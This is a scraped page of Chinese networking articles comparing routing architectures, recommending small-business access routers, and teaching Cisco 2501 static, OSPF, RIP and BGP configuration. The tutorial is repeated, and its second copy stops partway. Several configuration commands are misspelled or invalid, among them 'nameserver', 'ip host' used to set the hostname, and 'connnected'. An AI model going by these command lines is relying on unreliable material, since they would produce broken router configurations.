    网络延迟的增加会导致网络性能的下降，网络延迟的大小一般与设备在转发交通之前所必须处理的作业的大小成正比。对于第二层的以太交换机来讲，由于第二层虚拟网本质上使用桥而不使用路由器，因此相对速度较快，当执行一个简单的MAC地址寻找时，一个信息包(64字节)的延迟小于100微秒。第三层路由器的使用增加了头标的寻找及某些算法的执行，因此大大增加了信息包的延迟，其延迟时间高达5毫秒。
    可见，对于由第二层交换机与第三层路由器结合组成的网络，当交通经由交换机时具有相当好的性能;当交通从一个交换机经由路由器流向另一个交换机时性能较差。
    几乎所有的第二层交换机与软件配合使用都能将节点组成虚拟网络(广播域)，并以此改善网络的性能。同一虚拟网内节点之间的交通在MAC层进行交换，延迟较小。不同虚拟网之间的节点交换信息时，信息包传递要经过路由器，此时网络延迟较大。
    分布路由技术允许交换机在第三层协议子网ID虚拟网间传递信息，能克服上述路由器所形成的瓶颈。
    路由服务器法使用边界交换机做出路径的选择。偶而在边界交换机不知道发送目标地址时，才向路由服务器发询问信息包，此时才会出现寻径的延迟。正常情况下，交换机可以直接在缓存地址表中查找地址，之后可直接转发信息包，此种情况下产生的延迟与MAC层交换机的延迟基本相同。
3.管理
    路由信息存放于网络中各个路由器中，每种协议都有相应的表列。网管人员必须逐个对路由器进行配置，其中包括滤波器的设置，增加、修改路由表等。加之人机界面是基于文本的界面，因此当企业网扩展到较大规模时，路由器的管理与配置是相当费时的。
    分布式路由技术不利的一面是其管理的开销与路由及交换表数目的增加呈指数增加趋势。为了克服这一缺点，生产商家拟采用以下措施:在中心控制台制定交通管制策略，并通过网络自动传播，从而避免对每个设备逐一配置，并增加图形人机界面。
    路由服务器的特点是易于管理，只需对一个路由服务器的配置就可提供高质量的服务与虚拟网络的管理。如Cabletron公司的Securefast管理程序就能够允许网管人员利用屏幕，对不同组的用户分配访问权限，通过执行该软件将访问权限通知所有的交换机。
    路由服务器方法的另一个优点是，允许网管人员透明地制定交通管理策略，不必关心端站用户的类型。例如，网管人员可将以太交换机上的节点与ATM上的服务器分配给同一个虚拟局域网，而不必输入以太节点的MAC或IP地址，也不必输入ATM节点的VPI/VCI。 4.价格
    价格是人们组网考虑的另一个主要因素。以下作者给出几个公司生产的50、250、500个端口三种路由方式产品的平均每个端口价格的对比情况(见表1～2)。这里每个端口的价格是用端口的数目去除网络设备总价格所得的结果，网络设备包括以太交换机、ATM交换机、路由服务器与第三层路由器。
    路由服务器组网方式只有Newbridge公司给出价格，其50、250、500个端口设备每个端口的平均价格分别为1920、1520与1435美元。
    从上面给出的数据可以看出，基于第二层交换与路由器方式组网的方案价格最便宜，分布式路由技术组网价格最高，而路由服务器方式组网价格适中。从中我们还可发现，使用第二层交换机与第三层路由器组网时，随着网络规模的扩大，平均每个端口的价格越来越小，路由服务器组网的情况与之类似。但分布式路由器组网方式平均每个端口的价格受网络规模影响不大。

三、与ATM主干的连接
    由于路由服务器与分布式路由方式组成的交换LAN与ATM主干相连目前还没有统一的标准，故各公司提供的连接方式也不尽相同。
    常见的方法是将以太或令牌环局域网交换机的所有虚拟网的交通送往装有ATM接口卡的路由器，但这种作法的缺点是路由器将会成为整个网络的瓶颈，影响了网络的整体性能。
    较好的方法是，以太LAN交换机都备有各自的ATM接口，从而允许LAN交换机与ATM交换机直接建立连接，不必经由路由器，这是一个明显的改进。但不同虚拟网之间的数据传输仍需经过路由器，瓶颈依然存在。
    目前关于传统的交通在ATM上传输有两种标准:其一是ATM论坛制定
    的LAN仿真，另一种标准是国际计算机互连网络工程任务组IETF制定的ATM上的传统IP标准(IPOverATM)。LAN仿真运行于介质访问控制MAC层，它的最大好处是，能确保以太及令牌环的交通在不需对应用程序及人机界面做任何改变的情况下在ATM网上正常运行。IPOverATM标准与LAN仿真具有相同的目的，与LAN仿真不同的是，它只允许ATM交通运行于IP网络。但是，它们都没有彻底地解决不同虚拟网之间交通的传输，仍需要在不同虚拟网之间设有路由器:路由器将信元装配成信息包，完成路由选择，并在发送前再将信息包恢复成信元，这样做效率明显要低得多。为了消除路由器形成的瓶颈，ATM论坛制定了ATM上的多协议传输标准(MPOA)，其目的是解决ATM上的多种协议的传输，这其中包括IP、IPX/SPX与Appletalk等。MPOA的不同虚拟网之间的路由交通是基于网络层的交通信息(如IP子网地址)，以达到避免使用外部路由器的目的。

四、结论
    综上所述，三种路由器技术各有特点，各有所长，用户可根据自己的实际需要加以选择。需要强调的是，路由技术在当前，乃至于在可预见的未来，仍是交换网络的一个非常重要的组成部分，路由技术选择的正确与否会直接影响网络整体性能，必须予以足够的重视。

返回


接入路由器的几种选择

《一键清理系统垃圾》

接入路由器的几种选择

    虚拟场景为：一主干为百兆的以太网，数据点为200个。出于工作的需求，公司拟采用DDN专线方式接入Internet，同时采用ISDN或帧中继作为备份线路。

    这是一个中小型网络，用户数量不多，如何以合适的产品达到用户的需求是我们需要解决的问题。随着互联网时代的到来，仅搭建内部局域网已经不能满足众多企业的工作需求，有更多的用户需要在Internet上发布信息，或进行信息检索，将企业内部网接入Internet成为当前系统集成中常常碰到的工作项目之一。本期虚拟的是较为常见的环境，之所以如此设定这样一个典型场境，因为这是当前网络建设的一个重要增长点：中小企业网。

    我们都知道Internet（因特网）是当今世界上最大的国际性计算机广域网。其中包含不同的局域网类型。局域网接入广域网有很多方式，如普通电话拨号、卫星线路和数字网络等。而当计算机局域网与广域网要通过数字数据通信网（例如DDN、X.25、ISDN、帧中继等）进行互连时，通常采用路由器来实现。路由器是最重要的网络互连设备之一，它工作在网络层，用于互连不同类型的网络，使用路由器互连网络的最大特点是：各互连子网仍保持各自独立，每个子网可以采用不同的拓扑结构、传输介质和网络协议，网络结构层次分明。路由器的作用是在源节点和目的节点之间为数据交换选择路由，它提供了各种网络协议，路由器的功能主要有以下几种：(1)网络互连，路由器支持各种局域网和广域网接口，主要用于互连局域网和广域网；(2)数据处理，提供包括分组过滤、分组转发、优先级、复用、加密、压缩和防火墙等功能；(3)网络管理，路由器提供包括配置管理、性能管理、容错管理和流量控制等功能。

    由于各个企业以往大多停留于建设自己本身的内部计算机网络以提高工作效率、协同各部门工作，但随着Internet的迅猛发展，接入广域网或者是企业自身建设广域网已经越来越多地受到人们的关注。由此，路由器的使用频度得到了迅速提高。

    生产路由器的厂家很多，这个市场过去通常是国外的品牌一统天下，如Cisco,3Com,Cabletron,Nortel Networks等公司。如今，随着互联网时代的到来，许多国内厂商也瞄准了计算机网络这个具有无限潜力的市场，纷纷推出自有品牌的网络产品。从技术含量较低的产品到具有高技术水平的产品，国内公司以不懈的努力证实了自己的实力，我们欣喜地看到市场上出现华为、联想、实达等品牌的路由器产品。

    思科系统公司(Cisco Systems)是路由器技术的领导者，在Internet上流动的数据大多都会通过Cisco的设备，其中绝大多数是Cisco的路由器。可以说Internet成就了Cisco的辉煌。Cisco的路由器有多种系列，就本文的虚拟场景而言，我们推荐使用Cisco 1600系列路由器。Cisco 1600系列路由器是Cisco公司为中小型网络接入Internet而量身定做的，是中小企业的理想选择。这是因为1600系列除了有一个固定的广域网端口和一个固定以太网端口之外，Cisco 1600系列还支持一个广域网接口卡，允许客户根据需要添加或改变广域网端口，非常灵活而且又提供了投资保护。其中Cisco 1601 R - 1604 R 型路由器拥有一个以太网端口、一个内置的广域网端口以及一个用于可选的辅助广域网端口的插槽。1605 R路由器拥有2个以太网端口和1个广域网插槽。所有型号均带有可选的Cisco IOS 防火墙特性集。值得一提的是1600系列支持ISDN线路DDR按需拨号技术，只有在有效数据传输时，才进行拨号连接，在指定时间内无数据传输时自动断开连接，降低线路费用。这完全符合本期虚拟场景的需求，另外1600采用NAT技术可以让整个局域网200个用户同时上Internet，内置于IOS的防火墙功能可以保护内部网络，并节省用户在安全方面的投资。

    采用1600系列方案的特点和竞争优势：支持Cisco IOS 软件；具有闪存(PC卡)和内存更新功能，从而方便了软件维护。另外Cisco免费提供安装时需要的配置路由器网络工具；配有具有图形化界面Cisco ConfigMaker，可以简化设备配置和管理；Cisco产品采用FastStep配置实用程序(基于GUI)以简化安装和故障诊断；模块化的体系结构便于投资保护；完全的IOS支持，Cisco工业标准的网络解决方案；工业标准的IOS支持多种服务质量；接口卡与2600, 3600系列兼容方便灵活。

    华为自进入数据通信领域以来，已经推出了全系列的路由器产品，华为技术有限公司以华为自主品牌的网络核心技术为龙头，不断成长壮大，造就了今日出色的全系列网络产品。其中Quidway R1602 路由器比较满足本期的需求，是面向中小企业的产品。R1602接口丰富、灵活，报文处理能力强，配置维护简单。Quidway R1602 路由器具有一个RJ-45 Ethernet 接口，两个同/异步串口，一个备份口。用户可在PSTN/ISDN、Frame Relay、X.25和DDN等多种广域网技术中，灵活选择组网方案，这正适合本期的备份线路要求；另外它具有强大的报文处理能力，通过采用先进的CPU技术、高效的实时多任务操作系统以及独特的软件设计，使路由器报文处理能力非常强大；R1602路由器采用符合国际标准的网管系统：路由器的网络管理系统，符合国际SNMP标准，遵从于华为公司开发的统一的网络管理平台，便于集中网络管理；另外配有中英文双语配置界面：路由器提供的命令行用户接口，遵循业界流行的路由器配置方法，用户无需特殊培训便可全面配置此产品，中文提示和帮助信息将大大便利国内广大用户；此外，R1602提供了丰富的网络安全特性，如防火墙、包过滤、地址转换、AAA和Radius等，用户可以选择不同的安全策略来组建企业网；而且R1602采用备份中心技术，网络可靠性明显增加：可利用同步或异步接口的特性，实现拨号线对专线的备份，保证对高可靠性网络的需求。

    根据本期场景要求还可以选择联想的LR-2501路由器。LR-2501路由器具有1个10M局域网(LAN)口，2个广域网(WAN)口和1个控制台端口。所以满足本场景需要备份线路的特点。广域网接口可以支持帧中继(Frame Relay)、X.25、PPP、HDLC等多种广域网协议，提供达T1/E1的传输速率，同时提供网络地址转换(NAT)的功能。支持PAD(X.3/X.28/X.29)协议；提供密码保护功能。

    基于此网络应用场景，可以选择3Com的OfficeConnect NETBuilder路由器，它是应用较多的机型之一。OfficeConnect NETBuilder拥有一个10BASE-T LAN端口(局域网端口)和两个WAN端口(广域网端口)。每个模块都有一个Flex WAN串行口，支持高达2.048 Mbps(T1/E1线路)的速率；还有如下类型的第二个WAN端口：ISDN S/T、集成了NT-1的ISDN、56/64KCSU/DSU、Ft1/T1 CSU/DSU，或者第二个端口是加一个Flex WAN端口。

    3Com OfficeConnect NETBuilder路由器有很多优点，其中比较突出的有：安装简便，3Com公司独特的边界路由(Boundary Routing)体系结构、自启动功能（Autostartup）以及Web链接、内嵌套于Web的配置和管理工具，使得即插即用的安装非常简便并且易于远端分支机构的使用；广泛的安全性，该系列路由器内嵌由ICSA认证的防火墙、保护内部地址安全的网络地址转换(NAT)，支持IPSec和MPPE加密。

    OfficeConnect NETBuilder系列路由器通过对所有主要的WAN(广域网)协议的支持，能够适应各种规模的网络和多样化的连网需求，这些协议包括Frame Relay、X.25、PPP、ISDN、Async和SMDS。该系列路由器拥有灵活的迁移选项，以适应网络变更的需求。例如，当一个拥有边界路由器的小型分公司发展到需要IP/IPX支持时，路由器可以容易地升级到一台拥有上门软件升级服务的IP/IPX/AppleTalk路由器，而无须改动现有的硬件设备。如果您要求额外的带宽，则可以简单地通过更换CSU/DSU模块，将56/64KCSU/DSU WAN规格（12x K）升级到FT1/T1 WAN型号（12x T）。

    由于本期的虚拟场景是一个典型网络，所以通过产品选型，可以看到本期采用的产品是各个厂家都已成型的产品。同时我们可以看出中小企业网络的建设是众多厂商工作的重点之一，几乎每个厂商都有自己的相关产品。值得注意的是大多数厂商也不约而同地考虑了将来用户网络升级的问题，纷纷推出模块化的产品。这样无疑给用户带来了更多的选择，同时也充分保护了用户的投资。因为版面的问题，本期列出的只是众多产品的一部分，希望能给您一些帮助。

返回


结合实例讲解广域网路由基本技术

《一键清理系统垃圾》

结合实例讲解广域网路由基本技术

     我们假定读者对IP协议有一定程度的了解（不了解IP协议永远无法维护一个IP网络），比如至少懂得IP地址的结构、类别和子网、子网掩码的概念，并且具有一定的计算机基础知识。在配置路由器时，只要将计算机的串口通过路由器自带的专用电缆接到Console口，使用诸如超级终端或者Netterm之类的软件即可。

网络中的只有一块网卡（一个IP地址）任何一台主机只能直接访问本子网内的机器。而路由器相当于一台由多个网卡的主机，每一块网卡可以直接与一个子网通信。根据上图我们知道，两个网络相连主要是通过在其间建立一个广域网互联子网来进行。这个子网中只有两台机器，即两边的路由器，当然它的子网掩码就是255.255.255.252。只要路由器A、B的Seiral口在同一个子网，由于它们的Ethernet口分别属于A、B两网，我们就在A、B网之间建立了一条通道。网络A中的主机只要将网关设为路由器A，其信息即可通过路由器A、B转发到B网。

我们在例子中使用的是应用最广泛的Cisco 2501路由器，这种路由器物理结构简单，网络接口只有两个Serial口和一个Ethernet口，却支持完整的路由功能。采用的协议为TCP/IP，因为现在使用其他诸如IPX、Netbeui之类的协议已经是非常的不合时宜。

实例1：通过Cisco 2501连接A局域网与B局域网

假设实验条件如下：

A网：202.96.199.0——202.96.199.255
B网：202.97.76.0——202.97.76.31
DNS Server：202.96.199.2(主),202.96.199.3(备)
所属域：xxx.com
广域网互联：需要一个包含4个IP地址(2个可用IP)的子网，
定为：202.98.0.0——202.98.0.3，其中202.98.0.1给A网，202.98.0.2给B网
互联专线速率：128kbps

具体网络参数分配表如下： 项目
A网
B网

网络号
202.96.199.0
202.97.76.0

子网掩码
255.255.255.0
255.255.255.224

所属域
xxx.com
yyy.com

以太网地址
202.96.199.1
202.97.76.1

互联地址
202.98.0.1
202.98.0.2

专线速率
128kbps
同左

域名服务器
主：202.96.199.2
备：202.96.199.3
同左

首先进入路由器：将你的计算机串行口连接到路由器的Console口，使用Netterm或者超级终端之类的软件登录。

Router>en:
passwd:******(输入超级口令)
全局配置：（A、B网相同）

Router#conf terminal(切换到配置状态)
Router(config)#enable secret my-root-password(定义超级口令)
Router(config)#ip host Router-A（定义路由器名,B网为Router-B）
Router(config)#ip domain-name xxx.com（定义所属域名称，B网为yyy.com）
Router(config)#nameserver 202.96.199.2（定义主域名服务器）
Router(config)#nameserver 202.96.199.3（定义备域名服务器）
Router(config)#ip classless
Router(config)#line vty 0 4
（定义5个telnet虚终端，即可以同时有5个人登录本路由器）
Router(config-line)#password my-telnet-password（定义telnet口令）
Router(config-line)#exit
Router(config)#exit
地址和路由配置：

/******　A网路由器　******/
Router-A#conf t(切换到配置状态)
Router-A(config)#int e0(配置Ethernet 0口)
Router-A(config-if)#description the　LAN port link to my local network（端口说明）
Router-A(config-if)#ip add 202.96.199.1 255.255.255.0
（定义以太网IP地址，子网掩码表示为C类网络）
Router-A(config-if)#no shutdown（激活端口）
Router-A(config-if)#exit
Router-A(config)#int s0(配置Serial 0口)
Router-A(config-if)#description the　WAN port link to Router-B（端口说明）
Router-A(config-if)#ip add 202.98.0.1 255.255.255.252（定义互联广域网IP地址）
Router-A(config-if)#bandwidth 128（定义端口速率，单位：kbps）
Router-A(config-if)#no shutdown（激活端口）
Router-A(config-if)#exit
Router-A(config)#ip route 202.97.76.0 255.255.255.224 202.98.0.2
（定义静态路由，通过网关到达对端局域网络，IP为对端广域网IP地址）
Router-A(config)#exit
Router-A#wr m(保存配置)
/******　B网路由器　******/
Router-B#conf t
Router-B(config)#int e0
Router-B(config-if)#description the　LAN port link to my local network（端口说明）
Router-B(config-if)#ip add 202.97.76.1 255.255.255.224
（定义以太网IP地址，子网掩码表示为拥有32个地址的子网）
Router-B(config-if)#no shutdown
Router-B(config-if)#exit
Router-B(config)#int s0
Router-B(config-if)#description the　WAN port link to Router-A（端口说明）
Router-B(config-if)#ip add 202.98.0.2 255.255.255.252
Router-B(config-if)#bandwidth 128
Router-B(config-if)#no shutdown
Router-B(config-if)#exit
Router-B(config)#ip route 202.96.199.0 255.255.255.0 202.98.0.1
（定义静态路由，通过网关到达对端局域网络，IP为对端广域网IP地址）
Router-B(config)#exit
Router-B#wr m(保存配置)

配置完成。

这里是A网、B网路由器配置清单。
Router A:

        Router-A#sh run
        Building Configuration...
        Current configuration
        version 11.2
        service udp-small-servers
        service tcp-small-servers
        hostname Router-A
        enable secret test-a
        ip subnet-zero
        interface Ethernet0
          description the　LAN port link to my local network
          ip address 202.96.199.1 255.255.255.0
        interface Serial0
          description the　WAN port link to Router-B
          ip address 202.98.0.1 255.255.255.252
          bandwidth 128
        interface Serial1
          no ip address
          shutdown
        ip domain-name xxx.com
        ip name-server 202.96.199.2
        ip name-server 202.96.199.3
        ip classless
        ip route 202.97.76.0 255.255.255.224 202.98.0.2
        line con 0
        line aux 0
        line vty 0 4
          password telnet-a
          login
        end
        Router-A#
Rouer B:
Router-B#sh run

        Building Configuration...
        Current configuration
        version 11.2
        service udp-small-servers
        service tcp-small-servers
        hostname Router-B
        enable secret test-b
        ip subnet-zero
        interface Ethernet0
          description the　LAN port link to my local network
          ip address 202.97.76.1 255.255.255.224
        interface Serial0
          description the　WAN port link to Router-A
          ip address 202.98.0.2 255.255.255.252
          bandwidth 128
        interface Serial1
          no ip address
          shutdown
        ip domain-name yyy.com
        ip name-server 202.96.199.2
        ip name-server 202.96.199.3
        ip classless
        ip route　202.96.199.0 255.255.255.0 202.98.0.1
        line con 0
        line aux 0
        line vty 0 4
          password telnet-b
          login
        end
        Router-B#
实例2：通过Cisco 2501将你的局域网接入Internet

假设实验条件如下：

本网IP地址为：202.96.199.0——202.96.199.255
DNS Server：202.96.202.96(主)，202.96.96.202(备)
ISP分配的广域网互联IP地址为202.98.0.2

具体网络参数分配表如下： 项目
用户网络
ISP网络

网络号
202.96.199.0

子网掩码
255.255.255.0

所属域
xxx.com

以太网地址
202.96.199.1

互联地址
202.98.0.2
202.98.0.1

专线速率
128kbps
同左

域名服务器
主：202.96.202.96
备：202.96.96.202

我们已经有了上例的经验，则很容易根据相同的原理配置这个路由器。

首先进入路由器：

Router>en:

passwd:
全局配置：

Router#conf t

Router(config)#ip host Router

Router(config)#nameserver 202.96.202.96

Router(config)#nameserver 202.96.96.202

Router(config)#exit

其他项目同“例一”。
地址配置：

Router#conf t

Router(config)#int e0

Router(config-if)#description the　LAN port link to my local network（端口说明）

Router(config-if)#ip add 202.96.199.1 255.255.255.0

Router(config-if)#no shutdown（激活端口）

Router(config-if)#exit

Router(config)#int s0

Router(config-if)#description the　WAN port link to Internet（端口说明）

Router(config-if)#ip add 202.98.0.2 255.255.255.252

Router(config-if)#no shutdown（激活端口）

Router(config-if)#exit

路由配置：

Router(config)#ip route 0.0.0.0 0.0.0.0 202.98.0.1

（定义默认静态路由，所有的远程访问通过网关，IP为对端广域网IP地址）

Router(config)#exit

Router#wr m
配置完成。

这里是本网路由器配置清单。
Router#sh run
Building Configuration...
Current configuration
version 11.2
service udp-small-servers
service tcp-small-servers
hostname Router
enable secret test
ip subnet-zero
interface Ethernet0
description the LAN port link to my local network
ip address 202.96.199.1 255.255.255.0
interface Serial0
description the WAN port link to Internet
ip address 202.98.0.2 255.255.255.252
bandwidth 128
interface Serial1
no ip address
shutdown
ip domain-name xxx.com
ip name-server 202.96.202.96
ip name-server 202.96.96.202
ip classless
ip route 0.0.0.0 0.0.0.0 202.98.0.1
line con 0
line aux 0
line vty 0 4
password telnet
login
end
Router#

实例3：使用Cisco路由器对大型网络(例如ISP网络)进行扩容

当然，设计管理大型网络的路由非常复杂，一般都是由经过高级培训的专业人士进行。而且，大型网络一般都采用像Cisco 7507这样的高档路由器。在这里顺便简单讲述，主要是让大家开阔一下视野，了解一下其他的路由协议。

这时，与例2唯一的不同就是路由配置，不能采用静态路由协议而应该相应地采用非常优秀的OSPF动态路由协议并结合RIP协议。

假设具体网络参数如下： 项目
本地网络

网络号
202.96.199.0

子网掩码
255.255.255.0

OSPF编号
100

OSPF域
202.96.192.0——202.96.207.255，16个C

那么应该这样配置：

Router(config)#router ospf 100(配置OSPF路由)

Router(config-router)#summary-address 202.96.199.0 255.255.255.0

Router(config-router)#redistribute connnected metric-type 1 subnets

Router(config-router)#redistribute static(通过OSPF协议广播静态路由)

Router(config-router)#network 202.96.192.0 0.0.15.255 area 0.0.0.0

Router(config-router)#area 0.0.0.0 authentiication message-digest

Router(config-router)#exit

Router(config)#router rip(配置RIP路由)

Router(config-router)#redistribute ospf 100 metric 1(通过RIP协议广播OSPF路由)

Router(config-router)#passive-interface Serial 0(不在Serial 0上使用)

Router(config-router)#network 202.101.199.0(定义本网络)

Router(config-router)#exit

Router(config)exit
同时，采用OSPF协议时应该在广域网端口上加入授权机制：

Router(config)#int s0

Router(config-if)#ip ospf message-digest-key keyword

Router(config-if)#exit

Router(config)#exit

Router#wr m

更大型的网络会采用BGP边缘路由协议，假设具体网络参数如下： 项目
本地网络
远程网络

AS(自治域)
20000
4000

本地BGP网络
202.96.192.0——202.96.207.255，16个C
202.97.0.0——202.97.15.255，16个C
202.98.128.0——202.98.159.255，32个C

互联地址
202.100.4.2
202.100.4.1

则本地路由器配置方法为：

Router(config)#router bgp 20000(定义本BGP管理的AS--自治域编号)

Router(config-router)#no synchronization

Router(config-router)#network 202.96.192.0 mask 255.255.240.0

(定义本AS--自治域包含的网络)

Router(config-router)#network 202.97.0.0 mask 255.255.240.0

Router(config-router)#network 202.98.128.0 mask 255.255.224.0

Router(config-router)#neighbor 202.100.4.1 remote-as 4000

(定义到远端AS--自治域的网关IP)

Router(config-router)#exit

Router(config)#exit

Router#wr m

配置完成。

实用技术

一、使用口令加密机制：

Router(config)#service password-encryption(路由器密码将以暗码显示)

二、配置http server，以便从浏览器访问路由器：

Router(config)#ip http server

三、访问控制：

Router(config)#access-list 101 permit ip 10.150.0.0 0.0.255.255 any
(允许10.150.0.0——10.150.255.255访问)

Router(config)#access-list 101 deny ip 10.151.0.0 0.0.255.255 any
(禁止10.151.0.0——10.150.255.255访问)

四、负载分担：

要实现负载分担必须使用动态路由协议，以OSPF为例，只要将两条路由的代价(cost)设为相等，即可自动实现。

默认的OSPF代价为广域网线路64，局域网线路30，设置路径代价的命令为：
Router(config-if)#ip ospf cost xx。

五、常用命令：

Router#help/?(获得帮助)
Router#sh run(显示路由器当前配置)
Router#sh int Xn(接口名称，例如Ethernet 0、Serial 1等，显示接口状态)
Router#sh ip route(显示当前路由)
Router#wr m(储存配置，以便下次重启时使用)
Router#reload(重启路由器)
Router#ping ip-address(测试与其他主机的连接)
Router#telnet host(登录其它主机)

返回


结合实例讲解广域网路由基本技术

《一键清理系统垃圾》

结合实例讲解广域网路由基本技术

我们假定读者对IP协议有一定程度的了解（不了解IP协议永远无法维护一个IP网络），比如至少懂得IP地址的结构、类别和子网、子网掩码的概念，并且具有一定的计算机基础知识。在配置路由器时，只要将计算机的串口通过路由器自带的专用电缆接到Console口，使用诸如超级终端或者Netterm之类的软件即可。

a

     网络中的只有一块网卡（一个IP地址）任何一台主机只能直接访问本子网内的机器。而路由器相当于一台由多个网卡的主机，每一块网卡可以直接与一个子网通信。根据上图我们知道，两个网络相连主要是通过在其间建立一个广域网互联子网来进行。这个子网中只有两台机器，即两边的路由器，当然它的子网掩码就是255.255.255.252。只要路由器A、B的Seiral口在同一个子网，由于它们的Ethernet口分别属于A、B两网，我们就在A、B网之间建立了一条通道。网络A中的主机只要将网关设为路由器A，其信息即可通过路由器A、B转发到B网。

    我们在例子中使用的是应用最广泛的Cisco 2501路由器，这种路由器物理结构简单，网络接口只有两个Serial口和一个Ethernet口，却支持完整的路由功能。采用的协议为TCP/IP，因为现在使用其他诸如IPX、Netbeui之类的协议已经是非常的不合时宜。

实例1：通过Cisco 2501连接A局域网与B局域网

假设实验条件如下：

A网：202.96.199.0——202.96.199.255
B网：202.97.76.0——202.97.76.31
DNS Server：202.96.199.2(主),202.96.199.3(备)
所属域：xxx.com
广域网互联：需要一个包含4个IP地址(2个可用IP)的子网，
定为：202.98.0.0——202.98.0.3，其中202.98.0.1给A网，202.98.0.2给B网
互联专线速率：128kbps

具体网络参数分配表如下：

项目 A网 B网
网络号 202.96.199.0 202.97.76.0
子网掩码 255.255.255.0 255.255.255.224
所属域 xxx.com yyy.com
以太网地址 202.96.199.1 202.97.76.1
互联地址 202.98.0.1 202.98.0.2
专线速率 128kbps 同左
域名服务器 主：202.96.199.2
备：202.96.199.3 同左

  首先进入路由器：将你的计算机串行口连接到路由器的Console口，使用Netterm或者超级终端之类的软件登录。

Router>en:

passwd:******(输入超级口令)

全局配置：（A、B网相同）

Router#conf terminal(切换到配置状态)

Router(config)#enable secret my-root-password(定义超级口令)

Router(config)#ip host Router-A（定义路由器名,B网为Router-B）

Router(config)#ip domain-name xxx.com（定义所属域名称，B网为yyy.com）

Router(config)#nameserver 202.96.199.2（定义主域名服务器）

Router(config)#nameserver 202.96.199.3（定义备域名服务器）

Router(config)#ip classless

Router(config)#line vty 0 4

（定义5个telnet虚终端，即可以同时有5个人登录本路由器）

Router(config-line)#password my-telnet-password（定义telnet口令）

Router(config-line)#exit

Router(config)#exit

地址和路由配置：

/******　A网路由器　******/

Router-A#conf t(切换到配置状态)

Router-A(config)#int e0(配置Ethernet 0口)

Router-A(config-if)#description the LAN port link to my local network（端口说明）

Router-A(config-if)#ip add 202.96.199.1 255.255.255.0

（定义以太网IP地址，子网掩码表示为C类网络）

Router-A(config-if)#no shutdown（激活端口）

Router-A(config-if)#exit

Router-A(config)#int s0(配置Serial 0口)

Router-A(config-if)#description the WAN port link to Router-B（端口说明）

Router-A(config-if)#ip add 202.98.0.1 255.255.255.252（定义互联广域网IP地址）

Router-A(config-if)#bandwidth 128（定义端口速率，单位：kbps）

Router-A(config-if)#no shutdown（激活端口）

Router-A(config-if)#exit

Router-A(config)#ip route 202.97.76.0 255.255.255.224 202.98.0.2

（定义静态路由，通过网关到达对端局域网络，IP为对端广域网IP地址）

Router-A(config)#exit

Router-A#wr m(保存配置)

/******　B网路由器　******/

Router-B#conf t

Router-B(config)#int e0

Router-B(config-if)#description the LAN port link to my local network（端口说明）

Router-B(config-if)#ip add 202.97.76.1 255.255.255.224

（定义以太网IP地址，子网掩码表示为拥有32个地址的子网）

Router-B(config-if)#no shutdown

Router-B(config-if)#exit

Router-B(config)#int s0

Router-B(config-if)#description the WAN port link to Router-A（端口说明）

Router-B(config-if)#ip add 202.98.0.2 255.255.255.252

Router-B(config-if)#bandwidth 128

Router-B(config-if)#no shutdown

Router-B(config-if)#exit

Router-B(config)#ip route 202.96.199.0 255.255.255.0 202.98.0.1

（定义静态路由，通过网关到达对端局域网络，IP为对端广域网IP地址）

Router-B(config)#exit

Router-B#wr m(保存配置)

    配置完成。

    这里是A网、B网路由器配置清单。
Router A:

Router-A#sh run

Building Configuration...
Current configuration
version 11.2
service udp-small-servers
service tcp-small-servers
hostname Router-A
enable secret test-a
ip subnet-zero
interface Ethernet0
description the LAN port link to my local network
ip address 202.96.199.1 255.255.255.0
interface Serial0
description the WAN port link to Router-B
ip address 202.98.0.1 255.255.255.252
bandwidth 128
interface Serial1
no ip address
shutdown
ip domain-name xxx.com
ip name-server 202.96.199.2
ip name-server 202.96.199.3
ip classless
ip route 202.97.76.0 255.255.255.224 202.98.0.2
line con 0
line aux 0
line vty 0 4
password telnet-a
login
end
Router-A#
Rouer B:
Router-B#sh run

Building Configuration...
Current configuration
version 11.2
service udp-small-servers
service tcp-small-servers
hostname Router-B
enable secret test-b
ip subnet-zero
interface Ethernet0
description the LAN port link to my local network
ip address 202.97.76.1 255.255.255.224
interface Serial0
description the WAN port link to Router-A
ip address 202.98.0.2 255.255.255.252
bandwidth 128
interface Serial1
no ip address
shutdown
ip domain-name yyy.com
ip name-server 202.96.199.2
ip name-server 202.96.199.3
ip classless
ip route 202.96.199.0 255.255.255.0 202.98.0.1
line con 0
line aux 0
line vty 0 4
password telnet-b
login
end
Router-B#

实例2：通过Cisco 2501将你的局域网接入Internet

假设实验条件如下：

本网IP地址为：202.96.199.0——202.96.199.255
DNS Server：202.96.202.96(主)，202.96.96.202(备)
ISP分配的广域网互联IP地址为202.98.0.2

具体网络参数分配表如下：

项目 用户网络 ISP网络
网络号 202.96.199.0
子网掩码 255.255.255.0
所属域 xxx.com
以太网地址 202.96.199.1
互联地址 202.98.0.2 202.98.0.1
专线速率 128kbps 同左
域名服务器 主：202.96.202.96
备：202.96.96.202

我们已经有了上例的经验，则很容易根据相同的原理配置这个路由器。

首先进入路由器：

Router>en:

passwd:

全局配置：

Router#conf t

Router(config)#ip host Router

Router(config)#nameserver 202.96.202.96

Router(config)#nameserver 202.96.96.202

Router(config)#exit

其他项目同“例一”。

地址配置：

Router#conf t

Router(config)#int e0

Router(config-if)#description the LAN port link to my local network（端口说明）

Router(config-if)#ip add 202.96.199.1 255.255.255.0

Router(config-if)#no shutdown（激活端口）

Router(config-if)#exit

Router(config)#int s0

Router(config-if)#description the WAN port link to Internet（端口说明）

Router(config-if)#ip add 202.98.0.2 255.255.255.252

Router(config-if)#no shutdown（激活端口）

Router(config-if)#exit

路由配置：

Router(config)#ip route 0.0.0.0 0.0.0.0 202.98.0.1

（定义默认静态路由，所有的远程访问通过网关，IP为对端广域网IP地址）

Router(config)#exit

Router#wr m

    配置完成。

    这里是本网路由器配置清单。
Router#sh run
Building Configuration...
Current configuration
version 11.2
service udp-small-servers
service tcp-small-servers
hostname Router
enable secret test
ip subnet-zero
interface Ethernet0
description the LAN port link to my local network
ip address 202.96.199.1 255.255.255.0
interface Serial0
description the WAN port link to Internet
ip address 202.98.0.2 255.255.255.252
bandwidth 128
interface Serial1
no ip address
shutdown
ip domain-name xxx.com
ip name-server 202.96.202.96
ip name-server 202.96.96.202
ip classless
ip route 0.0.0.0 0.0.0.0 202.98.0.1
line con 0
line aux 0
line vty 0 4
password telnet
login
end
Router#

实例3：使用Cisco路由器对大型网络(例如ISP网络)进行扩容

    当然，设计管理大型网络的路由非常复杂，一般都是由经过高级培训的专业人士进行。而且，大型网络一般都采用像Cisco 7507这样的高档路由器。在这里顺便简单讲述，主要是让大家开阔一下视野，了解一下其他的路由协议。

